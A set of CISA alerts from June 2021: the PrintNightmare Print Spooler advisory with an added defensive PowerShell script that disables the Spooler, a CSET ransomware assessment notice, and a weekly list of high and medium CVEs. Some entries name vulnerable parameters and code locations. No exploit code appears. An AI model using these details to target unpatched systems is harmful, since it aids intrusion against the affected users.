PrintNightmare, Critical Windows Print Spooler Vulnerability

06/30/2021 05:32 PM EDT

Original release date: June 30, 2021

The CERT Coordination Center (CERT/CC) has released a VulNote for a critical remote code execution vulnerability in the Windows Print spooler service, noting: “while Microsoft has released an update for CVE-2021-1675, it is important to realize that this update does not address the public exploits that also identify as CVE-2021-1675.” An attacker can exploit this vulnerability—nicknamed PrintNightmare—to take control of an affected system.

CISA encourages administrators to disable the Windows Print spooler service in Domain Controllers and systems that do not print. Additionally, administrators should employ the following best practice from Microsoft’s how-to guides, published January 11, 2021: “Due to the possibility for exposure, domain controllers and Active Directory admin systems need to have the Print spooler service disabled. The recommended way to do this is using a Group Policy Object.” 
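As an added illustration of the mitigation described above (this script is not from the CISA advisory or from Microsoft's guidance), the following PowerShell checks a host's domain role and Print Spooler state, then stops and disables the service on domain controllers and on hosts the operator flags as non-printing. It assumes an elevated PowerShell 5.1 or later session on the target host; the -HostDoesNotPrint and -ReportOnly switch names are chosen for this example.

```powershell
# Added example, not part of the CISA advisory: per-host check and
# enforcement of "Print Spooler disabled" for domain controllers and
# systems that do not print. Group Policy remains the recommended way to
# roll this out; use this for verification or for hosts outside GPO scope.
param(
    # Set for member servers/workstations known not to print (assumption:
    # the operator decides this; domain controllers are always in scope).
    [switch]$HostDoesNotPrint,
    # Report the state without changing anything.
    [switch]$ReportOnly
)

$svc = Get-Service -Name Spooler -ErrorAction Stop

# Win32_ComputerSystem.DomainRole: 4 = backup domain controller,
# 5 = primary domain controller.
$domainRole = (Get-CimInstance -ClassName Win32_ComputerSystem).DomainRole
$isDomainController = $domainRole -in 4, 5

Write-Host ("Host {0}: DC={1} Spooler status={2} start type={3}" -f
    $env:COMPUTERNAME, $isDomainController, $svc.Status, $svc.StartType)

if (-not ($isDomainController -or $HostDoesNotPrint)) {
    Write-Host "Host prints and is not a domain controller: leave the Spooler running and apply the vendor update."
    return
}

if ($svc.Status -eq 'Stopped' -and $svc.StartType -eq 'Disabled') {
    Write-Host "Spooler is already stopped and disabled: compliant."
    return
}

if ($ReportOnly) {
    Write-Warning "Spooler should be stopped and disabled on this host."
    return
}

# Stop the running service and prevent it from starting again at boot.
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
Write-Host "Spooler stopped and set to Disabled."
```

For fleet-wide enforcement the same result is set centrally in a GPO under Computer Configuration > Policies > Windows Settings > Security Settings > System Services, with the Print Spooler service startup mode set to Disabled; the script above is useful to confirm that the policy has actually applied on a given domain controller.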

This product is provided subject to this Notification and this Privacy & Use policy.

CISA’s CSET Tool Sets Sights on Ransomware Threat

06/30/2021 12:45 PM EDT

Original release date: June 30, 2021

CISA has released a new module in its Cyber Security Evaluation Tool (CSET): the Ransomware Readiness Assessment (RRA). CSET is a desktop software tool that guides network defenders through a step-by-step process to evaluate their cybersecurity practices on their networks. CSET—applicable to both information technology (IT) and industrial control system (ICS) networks—enables users to perform a comprehensive evaluation of their cybersecurity posture using many recognized government and industry standards and recommendations.

The RRA is a self-assessment based on a tiered set of practices to help organizations better assess how well they are equipped to defend against and recover from a ransomware incident. CISA has tailored the RRA to varying levels of ransomware threat readiness to make it useful to all organizations regardless of their current cybersecurity maturity. The RRA:

  • Helps organizations evaluate their cybersecurity posture, with respect to ransomware, against recognized standards and best practice recommendations in a systematic, disciplined, and repeatable manner.
  • Guides asset owners and operators through a systematic process to evaluate their operational technology (OT) and information technology (IT) network security practices against the ransomware threat.
  • Provides an analysis dashboard with graphs and tables that present the assessment results in both summary and detailed form.

CISA strongly encourages all organizations to take the CSET Ransomware Readiness Assessment, available at https://github.com/cisagov/cset/.


CISA Begins Cataloging Bad Practices that Increase Cyber Risk

06/29/2021 06:27 AM EDT

Original release date: June 29, 2021

In a blog post by Executive Assistant Director (EAD) Eric Goldstein, CISA announced the creation of a catalog to document bad cybersecurity practices that are exceptionally risky for any organization and especially dangerous for those supporting designated Critical Infrastructure or National Critical Functions.

While extensive guidance on cybersecurity “best practices” exists, additional perspective is needed. Ending the most egregious risks requires organizations to make a concerted effort to stop bad practices.

CISA encourages cybersecurity leaders and professionals to review EAD Goldstein’s blog post and the new Bad Practices webpage and to monitor the webpage for updates. CISA also encourages all organizations to engage in the necessary actions and critical conversations to address bad practices.


Vulnerability Summary for the Week of June 21, 2021

06/28/2021 08:23 AM EDT

Original release date: June 28, 2021

High Vulnerabilities

Primary Vendor — Product | Published | CVSS Score | CVE | Source & Patch Info
(each entry's description follows on the indented line below it)

apache — nuttx | 2021-06-21 | 7.5 | CVE-2021-26461 | CONFIRM
  Apache NuttX versions prior to 10.1.0 are vulnerable to integer wrap-around in the functions malloc, realloc and memalign. This improper memory assignment can lead to arbitrary memory allocation, resulting in unexpected behavior such as a crash or remote code injection/execution.

autoptimize — autoptimize | 2021-06-21 | 7.5 | CVE-2021-24376 | CONFIRM
  The Autoptimize WordPress plugin before 2.7.8 attempts to delete malicious files (such as .php) from the uploaded archive via the "Import Settings" feature, after its extraction. However, the extracted folders are not checked, so it is possible to upload a zip that contains a directory with a PHP file in it, and that file is then not removed from the disk. It is a bypass of CVE-2020-24948, which allows sending a PHP file via the "Import Settings" functionality to achieve Remote Code Execution.

ayecode — location_manager | 2021-06-21 | 7.5 | CVE-2021-24361 | MISC, CONFIRM
  In the Location Manager WordPress plugin before 2.1.0.10, the AJAX action gd_popular_location_list did not properly sanitise or validate some of its POST parameters, which are then used in a SQL statement, leading to unauthenticated SQL Injection issues.

cleo — lexicom | 2021-06-18 | 7.5 | CVE-2021-33576 | MISC, MISC
  An issue was discovered in Cleo LexiCom 5.5.0.0. Within the AS2 message, the sender can specify a filename. This filename can include path-traversal characters, allowing the file to be written to an arbitrary location on disk.

contiki-ng — contiki-ng | 2021-06-18 | 7.5 | CVE-2021-21281 | MISC, CONFIRM
  Contiki-NG is an open-source, cross-platform operating system for internet of things devices. A buffer overflow vulnerability exists in Contiki-NG versions prior to 4.6. After establishing a TCP socket using the tcp-socket library, it is possible for the remote end to send a packet with a data offset that is unvalidated. The problem has been patched in Contiki-NG 4.6. Users can apply the patch for this vulnerability out-of-band as a workaround.

contiki-ng — contiki-ng | 2021-06-18 | 7.5 | CVE-2021-21280 | MISC, CONFIRM
  Contiki-NG is an open-source, cross-platform operating system for internet of things devices. It is possible to cause an out-of-bounds write in versions of Contiki-NG prior to 4.6 when transmitting a 6LoWPAN packet with a chain of extension headers. Unfortunately, the written header is not checked to be within the available space, thereby making it possible to write outside the buffer. The problem has been patched in Contiki-NG 4.6. Users can apply the patch for this vulnerability out-of-band as a workaround.

contiki-ng — contiki-ng | 2021-06-18 | 7.8 | CVE-2021-21279 | CONFIRM
  Contiki-NG is an open-source, cross-platform operating system for internet of things devices. In versions prior to 4.6, an attacker can perform a denial-of-service attack by triggering an infinite loop in the processing of IPv6 neighbor solicitation (NS) messages. This type of attack can effectively shut down the operation of the system because of the cooperative scheduling used for the main parts of Contiki-NG and its communication stack. The problem has been patched in Contiki-NG 4.6. Users can apply the patch for this vulnerability out-of-band as a workaround.

contiki-ng — contiki-ng | 2021-06-18 | 7.5 | CVE-2021-21282 | MISC, CONFIRM
  Contiki-NG is an open-source, cross-platform operating system for internet of things devices. In versions prior to 4.5, a buffer overflow can be triggered by an input packet when using either of Contiki-NG's two RPL implementations in source-routing mode. The problem has been patched in Contiki-NG 4.5. Users can apply the patch for this vulnerability out-of-band as a workaround.

google — android | 2021-06-21 | 7.2 | CVE-2021-0478 | MISC
  In updateDrawable of StatusBarIconView.java, there is a possible permission bypass due to an uncaught exception. This could lead to local escalation of privilege by running foreground services without notifying the user, with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-8.1, Android-9. Android ID: A-169255797.

google — android | 2021-06-21 | 8.3 | CVE-2021-0507 | MISC
  In handle_rc_metamsg_cmd of btif_rc.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution over Bluetooth with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-8.1, Android-9, Android-10. Android ID: A-181860042.

google — android | 2021-06-21 | 7.2 | CVE-2021-0505 | MISC
  In the Settings app, there is a possible way to disable an always-on VPN due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-179975048.

google — android | 2021-06-21 | 7.5 | CVE-2021-0516 | MISC
  In p2p_process_prov_disc_req of p2p_pd.c, there is a possible out of bounds read and write due to a use after free. This could lead to remote escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-8.1, Android-9, Android-10. Android ID: A-181660448.

greenbone — greenbone_security_assistant | 2021-06-21 | 7.5 | CVE-2018-25016 | MISC, MISC
  Greenbone Security Assistant (GSA) before 7.0.3 and Greenbone OS (GOS) before 5.0.0 allow Host Header Injection.

jenkins — generic_webhook_trigger | 2021-06-18 | 7.5 | CVE-2021-21669 | CONFIRM, MLIST
  Jenkins Generic Webhook Trigger Plugin 1.72 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

joomla — joomla! | 2021-06-21 | 7.5 | CVE-2010-1435 | MISC, MISC
  Joomla! Core is prone to a security bypass vulnerability. Exploiting this issue may allow attackers to perform otherwise restricted actions and subsequently retrieve password reset tokens from the database through an already existing SQL injection vector. Joomla! Core versions 1.5.x ranging from 1.5.0 up to and including 1.5.15 are vulnerable.

joomla — joomla! | 2021-06-21 | 7.5 | CVE-2010-1433 | MISC, MISC
  Joomla! Core is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to properly verify user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. Joomla! Core versions 1.5.x ranging from 1.5.0 up to and including 1.5.15 are vulnerable.

primion-digitek — secure_8 | 2021-06-18 | 7.5 | CVE-2021-3604 | CONFIRM, CONFIRM
  Secure 8 (Evalos) does not validate user input data correctly, allowing a remote attacker to perform a Blind SQL Injection. An attacker could exploit this vulnerability in order to extract information on user and administrator accounts stored in the database.

radykal — fancy_product_designer | 2021-06-21 | 7.5 | CVE-2021-24370 | MISC, CONFIRM
  The Fancy Product Designer WordPress plugin before 4.6.9 allows unauthenticated attackers to upload arbitrary files, resulting in remote code execution.

serenityos — serenityos | 2021-06-18 | 7.5 | CVE-2021-31272 | MISC, MISC, MISC, CONFIRM
  SerenityOS before commit 3844e8569689dd476064a0759d704bc64fb3ca2c contains a directory traversal vulnerability in tar/unzip that may lead to command execution or privilege escalation.

textpattern — textpattern | 2021-06-21 | 7.5 | CVE-2020-19510 | MISC
  Textpattern 4.7.3 contains an arbitrary file load via the file_insert function in include/txp_file.php.

txjia — imcat | 2021-06-23 | 7.5 | CVE-2020-20392 | MISC
  SQL Injection vulnerability in imcat v5.2 via the fm[auser] parameter in coms/add_coms.php.

white_shark_systems_project — white_shark_systems | 2021-06-21 | 7.5 | CVE-2020-20466 | MISC
  White Shark System (WSS) 1.3.2 is vulnerable to unauthorized access via user_edit_password.php; remote attackers can modify the password of any user.

white_shark_systems_project — white_shark_systems | 2021-06-21 | 9 | CVE-2020-20471 | MISC
  White Shark System (WSS) 1.3.2 has an unauthorized access vulnerability in default_user_edit.php; remote attackers can exploit this vulnerability to escalate to admin privileges.


Medium Vulnerabilities

Primary Vendor — Product | Published | CVSS Score | CVE | Source & Patch Info
(each entry's description follows on the indented line below it)

5none — nonecms | 2021-06-22 | 5 | CVE-2020-18647 | MISC
  Information Disclosure in NoneCMS v1.3 allows remote attackers to obtain sensitive information via the component "/nonecms/vendor".

5none — nonecms | 2021-06-22 | 5 | CVE-2020-18646 | MISC
  Information Disclosure in NoneCMS v1.3 allows remote attackers to obtain sensitive information via the component "/public/index.php".

accellion — kiteworks | 2021-06-23 | 4.6 | CVE-2021-31585 | CONFIRM, MISC
  Accellion Kiteworks before 7.3.1 allows a user with Admin privileges to escalate their privileges by generating SSH passwords that allow local access.

accellion — kiteworks | 2021-06-23 | 6.5 | CVE-2021-31586 | MISC, CONFIRM
  Accellion Kiteworks before 7.4.0 allows an authenticated user to perform SQL Injection via LDAPGroup Search.

advantech — webaccess/scada | 2021-06-18 | 6.8 | CVE-2021-32954 | MISC
  Advantech WebAccess/SCADA versions 9.0.1 and prior are vulnerable to directory traversal, which may allow an attacker to remotely read arbitrary files on the file system.

advantech — webaccess/scada | 2021-06-18 | 5.8 | CVE-2021-32956 | MISC
  Advantech WebAccess/SCADA versions 9.0.1 and prior are vulnerable to redirection, which may allow an attacker to send a maliciously crafted URL that could result in redirecting a user to a malicious webpage.

akaunting — akaunting | 2021-06-21 | 6.8 | CVE-2020-22390 | MISC
  Akaunting <= 2.0.9 is vulnerable to CSV injection in the Item name field of the export function. Attackers can inject arbitrary code into the name parameter and achieve code execution when the crafted file is opened.

automattic — jetpack | 2021-06-21 | 5 | CVE-2021-24374 | CONFIRM, MISC
  The Jetpack Carousel module of the JetPack WordPress plugin before 9.8 allows users to create a "carousel" type image gallery and allows users to comment on the images. A security vulnerability was found within the Jetpack Carousel module by nguyenhg_vcs that allowed the comments of non-published pages/posts to be leaked.

autoptimize — autoptimize | 2021-06-21 | 6.8 | CVE-2021-24377 | CONFIRM
  The Autoptimize WordPress plugin before 2.7.8 attempts to remove potentially malicious files from the extracted archive uploaded via the 'Import Settings' feature; however, this is not sufficient to protect against RCE, as a race condition can be achieved between the moment the file is extracted on the disk and the moment it is removed. It is a bypass of CVE-2020-24948.

bosch — b426_firmware | 2021-06-18 | 6.8 | CVE-2021-23845 | CONFIRM
  This vulnerability could allow an attacker to hijack a session while a user is logged in to the configuration web page. This vulnerability was discovered by a security researcher in B426 and found during internal product tests in B426-CN/B429-CN and B426-M, and has already been fixed starting from version 3.08, which was released in June 2019.

bosch — b426_firmware | 2021-06-18 | 4.3 | CVE-2021-23846 | CONFIRM
  When using the http protocol, the user password is transmitted as a clear text parameter, which makes it possible for an attacker to obtain it through a MITM attack. This will be fixed starting from Firmware version 3.11.5, which will be released on the 30th of June, 2021.

cleo — lexicom | 2021-06-18 | 5 | CVE-2021-33577 | MISC, MISC
  An issue was discovered in Cleo LexiCom 5.5.0.0. The requirement for the sender of an AS2 message to identify themselves (via encryption and signing of the message) can be bypassed by changing the Content-Type of the message to text/plain.

collne — welcart | 2021-06-22 | 4.3 | CVE-2021-20734 | MISC, MISC
  Cross-site scripting vulnerability in Welcart e-Commerce versions prior to 2.2.4 allows remote attackers to inject arbitrary script or HTML via unspecified vectors.

color-string_project — color-string | 2021-06-21 | 5 | CVE-2021-29060 | MISC, MISC, MISC, MISC
  A Regular Expression Denial of Service (ReDoS) vulnerability was discovered in Color-String version 1.5.5 and below, which occurs when the application is provided and checks a crafted invalid HWB string.

contiki-ng — contiki-ng | 2021-06-18 | 5 | CVE-2021-21257 | MISC, CONFIRM
  Contiki-NG is an open-source, cross-platform operating system for internet of things devices. The RPL-Classic and RPL-Lite implementations in the Contiki-NG operating system versions prior to 4.6 do not validate the address pointer in the RPL source routing header. This makes it possible for an attacker to cause out-of-bounds writes with packets injected into the network stack. Specifically, the problem lies in the rpl_ext_header_srh_update function in the two rpl-ext-header.c modules for RPL-Classic and RPL-Lite respectively. The addr_ptr variable is calculated using an unvalidated CMPR field value from the source routing header. An out-of-bounds write can be triggered on line 151 in os/net/routing/rpl-lite/rpl-ext-header.c and line 261 in os/net/routing/rpl-classic/rpl-ext-header.c, which contain the following memcpy call with addr_ptr as destination. The problem has been patched in Contiki-NG 4.6. Users can apply a patch out-of-band as a workaround.

contiki-ng — contiki-ng | 2021-06-18 | 6.4 | CVE-2021-21410 | CONFIRM, MISC
  Contiki-NG is an open-source, cross-platform operating system for Next-Generation IoT devices. An out-of-bounds read can be triggered by 6LoWPAN packets sent to devices running Contiki-NG 4.6 and prior. The IPv6 header decompression function (uncompress_hdr_iphc) does not perform proper boundary checks when reading from the packet buffer. Hence, it is possible to construct a compressed 6LoWPAN packet that will read more bytes than are available from the packet buffer. As of the time of publication, there is no release with a patch available. Users can apply the patch for this vulnerability out-of-band as a workaround.

ec-cube — business_form_output | 2021-06-22 | 4.3 | CVE-2021-20744 | MISC, MISC
  Cross-site scripting vulnerability in the EC-CUBE Category contents plugin (for the EC-CUBE 3.0 series) versions prior to version 1.0.1 allows a remote attacker to inject an arbitrary script by leading an administrator or a user to a specially crafted page and having them perform a specific operation.

ec-cube — business_form_output | 2021-06-22 | 4.3 | CVE-2021-20742 | MISC, MISC
  Cross-site scripting vulnerability in the EC-CUBE Business form output plugin (for the EC-CUBE 3.0 series) versions prior to version 1.0.1 allows a remote attacker to inject an arbitrary script via an unspecified vector.

ec-cube — email_newsletters_management | 2021-06-22 | 4.3 | CVE-2021-20743 | MISC, MISC
  Cross-site scripting vulnerability in the EC-CUBE Email newsletters management plugin (for the EC-CUBE 3.0 series) versions prior to version 1.0.4 allows a remote attacker to inject an arbitrary script by leading a user to a specially crafted page and having them perform a specific operation.

expresstech — quiz_and_survey_master | 2021-06-20 | 4.3 | CVE-2021-24368 | CONFIRM
  The Quiz And Survey Master – Best Quiz, Exam and Survey Plugin WordPress plugin before 7.1.18 did not sanitise or escape its result_id parameter when displaying an existing quiz result page, leading to a reflected Cross-Site Scripting issue. This could allow for privilege escalation by inducing a logged-in admin to open a malicious link.

get-simple — getsimplecms | 2021-06-23 | 4.3 | CVE-2020-18658 | MISC, MISC, MISC
  Cross Site Scripting (XSS) vulnerability in GetSimpleCMS <= 3.3.15 via the timezone parameter to settings.php.

get-simple — getsimplecms | 2021-06-23 | 4.3 | CVE-2020-18659 | MISC, MISC, MISC
  Cross Site Scripting vulnerability in GetSimpleCMS <= 3.3.15 via the (1) sitename, (2) username, and (3) email parameters to /admin/setup.php.

getastra — wp_hardening | 2021-06-21 | 4.3 | CVE-2021-24372 | CONFIRM
  The WP Hardening – Fix Your WordPress Security WordPress plugin before 1.2.2 did not sanitise or escape $_SERVER['REQUEST_URI'] before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue.

getastra — wp_hardening | 2021-06-21 | 4.3 | CVE-2021-24373 | CONFIRM
  The WP Hardening – Fix Your WordPress Security WordPress plugin before 1.2.2 did not sanitise or escape the historyvalue GET parameter before outputting it in a JavaScript block, leading to a reflected Cross-Site Scripting issue.

gitpod — gitpod | 2021-06-22 | 5.8 | CVE-2021-35206 | MISC, MISC, MISC, MISC, MISC, MISC, MISC, MISC
  Gitpod before 0.6.0 allows unvalidated redirects.

google — android | 2021-06-22 | 4.6 | CVE-2021-0539 | MISC
  In archiveStoredConversation of MmsService.java, there is a possible way to archive a message conversation without user consent due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-180419673.

google — android | 2021-06-22 | 4.6 | CVE-2021-0536 | MISC
  In dropFile of WiFiInstaller, there is a way to delete files accessible to CertInstaller due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-176756691.

google — android | 2021-06-22 | 4.6 | CVE-2021-0535 | MISC
  In wpas_ctrl_msg_queue_timeout of ctrl_iface_unix.c, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-168314741.

google — android | 2021-06-22 | 4.6 | CVE-2021-0540 | MISC
  In halWrapperDataCallback of hal_wrapper.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-169328517.

google — android | 2021-06-22 | 5 | CVE-2021-0555 | MISC
  In RenderStruct of protostream_objectsource.cc, there is a possible crash due to a missing null check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-179161711.

google — android | 2021-06-21 | 5 | CVE-2021-0522 | MISC
  In ConnectionHandler::SdpCb of connection_handler.cc, there is a possible out of bounds read due to a use after free. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-9, Android-10. Android ID: A-174182139.

google — android | 2021-06-21 | 6.9 | CVE-2021-0506 | MISC
  In ActivityPicker.java, there is a possible bypass of user interaction in intent resolution due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10, Android-11, Android-8.1, Android-9. Android ID: A-181962311.

google — android | 2021-06-22 | 4.6 | CVE-2021-0534 | MISC
  In permission declarations of DeviceAdminReceiver.java, there is a possible lack of broadcast protection due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-170639543.

google — android | 2021-06-21 | 4.6 | CVE-2021-0531 | MISC
  In the memory management driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-185195272.

google — android | 2021-06-21 | 4.6 | CVE-2021-0530 | MISC
  In the memory management driver, there is a possible out of bounds write due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-185196175.

google — android | 2021-06-21 | 4.6 | CVE-2021-0529 | MISC
  In the memory management driver, there is a possible memory corruption due to improper locking. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-185195268.

google — android | 2021-06-21 | 4.6 | CVE-2021-0528 | MISC
  In the memory management driver, there is a possible memory corruption due to a double free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-185195266.

google — android | 2021-06-21 | 4.6 | CVE-2021-0527 | MISC
  In the memory management driver, there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-185193931.

google — android | 2021-06-22 | 4.6 | CVE-2021-0543 | MISC
  In phNxpNciHal_process_ext_rsp of phNxpNciHal_ext.cc, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-169258743.

google — android | 2021-06-21 | 4.6 | CVE-2021-0526 | MISC
  In the memory management driver, there is a possible out of bounds write due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-185195264.

google — android | 2021-06-21 | 4.6 | CVE-2021-0525 | MISC
  In the memory management driver, there is a possible out of bounds write due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-185193929.

google — android | 2021-06-21 | 4.6 | CVE-2021-0513 | MISC
  In deleteNotificationChannel and related functions of NotificationManagerService.java, there is a possible permission bypass due to improper state validation. This could lead to local escalation of privilege via hidden services with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9, Android-10, Android-11, Android-8.1. Android ID: A-156090809.

google — android | 2021-06-21 | 4.6 | CVE-2021-0512 | MISC
  In __hidinput_change_resolution_multipliers of hid-input.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-173843328. References: Upstream kernel.

google — android | 2021-06-21 | 4.6 | CVE-2021-0511 | MISC
  In Dex2oat of dex2oat.cc, there is a possible way to inject bytecode into an app due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-9, Android-10, Android-11. Android ID: A-178055795.

google — android | 2021-06-22 | 4.9 | CVE-2021-0605 | MISC
  In pfkey_dump of af_key.c, there is a possible out-of-bounds read due to a missing bounds check. This could lead to local information disclosure in the kernel with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android kernel. Android ID: A-110373476.

google — android | 2021-06-21 | 5 | CVE-2021-0517 | MISC
  In updateCapabilities of ConnectivityService.java, there is a possible incorrect network state determination due to a logic error in the code. This could lead to biasing of networking tasks to occur on non-VPN networks, which could lead to remote information disclosure, with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-179053823.

google — android | 2021-06-22 | 4.6 | CVE-2021-0570 | MISC
  In sendBugreportNotification of BugreportProgressService.java, there is a possible permission bypass due to an unsafe PendingIntent. This could lead to local escalation of privilege with User execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-178803845.

google — android | 2021-06-22 | 4.6 | CVE-2021-0544 | MISC
  In phNxpNciHal_print_res_status of phNxpNciHal.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-169257710.

google — android | 2021-06-21 | 4.4 | CVE-2021-0523 | MISC
  In onCreate of WifiScanModeActivity.java, there is a possible way to enable Wi-Fi scanning without user consent due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-10, Android-11. Android ID: A-174047492.

google — android | 2021-06-22 | 4.3 | CVE-2021-0551 | MISC
  In bind of MediaControlPanel.java, there is a possible way to lock up the system UI using a malicious media file due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-180518039.

google — android | 2021-06-22 | 6.8 | CVE-2021-0557 | MISC
  In setRange of ABuffer.cpp, there is a possible out of bounds write due to an integer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-179046129.

google — android | 2021-06-22 | 4.3 | CVE-2021-0558 | MISC
  In fillMainDataBuf of pvmp3_framedecoder.cpp, there is a possible out of bounds read due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-173473906.

google — android | 2021-06-22 | 4.3 | CVE-2021-0559 | MISC
  In Lag_max of p_ol_wgh.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-172312730.

google — android | 2021-06-22 | 4.4 | CVE-2021-0565 | MISC
  In wrapUserThread of AudioStream.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-174801970.

google — android | 2021-06-22 | 4.4 | CVE-2021-0564 | MISC
  In decrypt of CryptoPlugin.cpp, there is a possible use-after-free due to a race condition. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-176495665.

google — android | 2021-06-22 | 4.4 | CVE-2021-0553 | MISC
  In onBindViewHolder of AppSwitchPreference.java, there is a possible bypass of device admin settings due to unclear UI. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-169936038.

google — android | 2021-06-22 | 4.4 | CVE-2021-0538 | MISC
  In onCreate of EmergencyCallbackModeExitDialog.java, there is a possible exit of emergency callback mode due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-178821491.

google — android | 2021-06-22 | 4.4 | CVE-2021-0537 | MISC
  In onCreate of WiFiInstaller.java, there is a possible way to install a malicious Hotspot 2.0 configuration due to a tapjacking/overlay attack. This could lead to local escalation of privilege with User execution privileges needed. User interaction is needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-176756141.

google — android | 2021-06-21 | 4.4 | CVE-2021-0533 | MISC
  In the memory management driver, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-185193932.

google — android | 2021-06-21 | 4.4 | CVE-2021-0532 | MISC
  In the memory management driver, there is a possible memory corruption due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android SoC. Android ID: A-185196177.

google — android | 2021-06-21 | 4.4 | CVE-2021-0520 | MISC
  In several functions of MemoryFileSystem.cpp and related files, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11, Android-10. Android ID: A-176237595.

google — android | 2021-06-22 | 4.6 | CVE-2021-0545 | MISC
  In phNxpNciHal_print_res_status of phNxpNciHal.cc, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege in the NFC server with System execution privileges needed. User interaction is not needed for exploitation. Product: Android. Versions: Android-11. Android ID: A-169258884.
MISC
google — android In various functions of CryptoPlugin.cpp, there is a possible use after free due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android-9 Android-10 Android-11 Android-8.1Android ID: A-176444161 2021-06-21 4.4 CVE-2021-0509
MISC
google — android In handleAppLaunch of AppLaunchActivity.java, there is a possible arbitrary activity launch due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-174870704 2021-06-22 4.6 CVE-2021-0608
MISC
